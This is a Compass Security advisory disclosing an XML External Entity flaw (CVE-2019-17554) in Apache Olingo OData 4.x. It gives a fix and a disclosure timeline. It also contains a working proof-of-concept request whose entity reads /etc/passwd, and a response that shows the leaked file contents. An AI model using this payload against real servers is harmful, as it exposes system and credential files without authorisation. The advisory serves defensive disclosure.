#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  Apache Olingo OData 4.0
# Vendor:   Apache Foundation
# CSNC ID:  CSNC-2009-025
# CVE ID:   CVE-2019-17554
# Subject:  XML External Entity Resolution (XXE)
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Archibald Haddock (advisories@compass-security.com)
# Date:     08.11.2019
#
#############################################################

Introduction:
-------------
Apache Olingo is a Java library that implements the Open Data Protocol (OData). [1]
XML data is parsed by insecurley configured software components, which can be abused for XML External Entity Attacks [2].



Affected:
---------
Vulnerable:
 * Olingo OData 4.x.x to 4.6.x

Not vulnerable:
 * Olingo OData 4.7.0
 * The Olingo OData 2.0 implementation has XXE protection since 1.1.0-RC01

Technical Description
---------------------
The XML content type entity deserializer is not configured to deny the resolution of external entities.
Request with content type "application/xml", which trigger the deserialization of entities, can be used to trigger XXE attacks.

Request
======
POST /odata-server-sample/cars.svc/Cars HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8081/odata-server-sample/
Cookie: JSESSIONID=17C3158153CDC2CA1DBA0E77D4AFC3B0
Upgrade-Insecure-Requests: 1
content-type: application/xml
Content-Length: 1101

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars/$entity">
  <a:id>Cars(1)</a:id>
  <a:title></a:title>
  <a:summary></a:summary>
  <a:updated>2019-11-08T15:10:30Z</a:updated>
  <a:author>
    <a:name></a:name>
  </a:author>
  <a:link rel="edit" href="Cars(1)"></a:link>
  <a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link>
  <a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category>
  <a:content type="application/xml">
    <m:properties>
      <d:Id m:type="Int16">1</d:Id>
      <d:Model>F1 &xxe;</d:Model>
      <d:ModelYear>2012</d:ModelYear>
      <d:Price m:type="Decimal">189189.43</d:Price>
      <d:Currency>EUR</d:Currency>
    </m:properties>
  </a:content>
</a:entry>

Response
========
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
OData-Version: 4.0
Content-Type: application/xml
Content-Length: 960
Date: Fri, 08 Nov 2019 14:22:35 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?><a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars"><a:id>Cars(1)</a:id><a:title></a:title><a:summary></a:summary><a:updated>2019-11-08T15:22:35Z</a:updated><a:author><a:name></a:name></a:author><a:link rel="edit" href="Cars(1)"></a:link><a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link><a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category><a:content type="application/xml"><m:properties><d:Id m:type="Int16">1</d:Id><d:Model>
myuser:x:1000:1000:,,,:/home/myuser:/bin/bash
</d:Model><d:ModelYear>2012</d:ModelYear><d:Price m:type="Decimal">189189.43</d:Price><d:Currency>EUR</d:Currency></m:properties></a:content></a:entry>


Workaround / Fix:
-----------------
Configure the XML reader securely [3].

In org.apache.olingo.server.core.deserializer.xml.ODataXmlDeserializer.java on line 70 a javax.xml.stream.XMLInputFactory is instanciated:
private static final XMLInputFactory FACTORY = XMLInputFactory.newFactory();

The XMLInputFactory should be configured, not to resolve external entities:
FACTORY.setProperty(XMLInputFactory.SUPPORT_DTD, false);
FACTORY.setProperty("javax.xml.stream.isSupportingExternalEntities", false);


Timeline:
---------
2019-11-08:     Discovery by Compass Security
2019-11-08:     Initial vendor notification
2019-11-08:     Initial vendor response
2019-12-04:     Release of fixed Version / Patch [4]
2019-12-05:     Coordinated public disclosure date


[1] https://olingo.apache.org/
[2] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
[3] https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
[4] https://mail-archives.apache.org/mod_mbox/olingo-user/201912.mbox/%3CCAGSZ4d7Ty%3DL-n_iAzT6vcQp65BY29XZDS5tMoM8MdDrb1moM7A%40mail.gmail.com%3E

Source: https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2019-025_apache_xxe.txt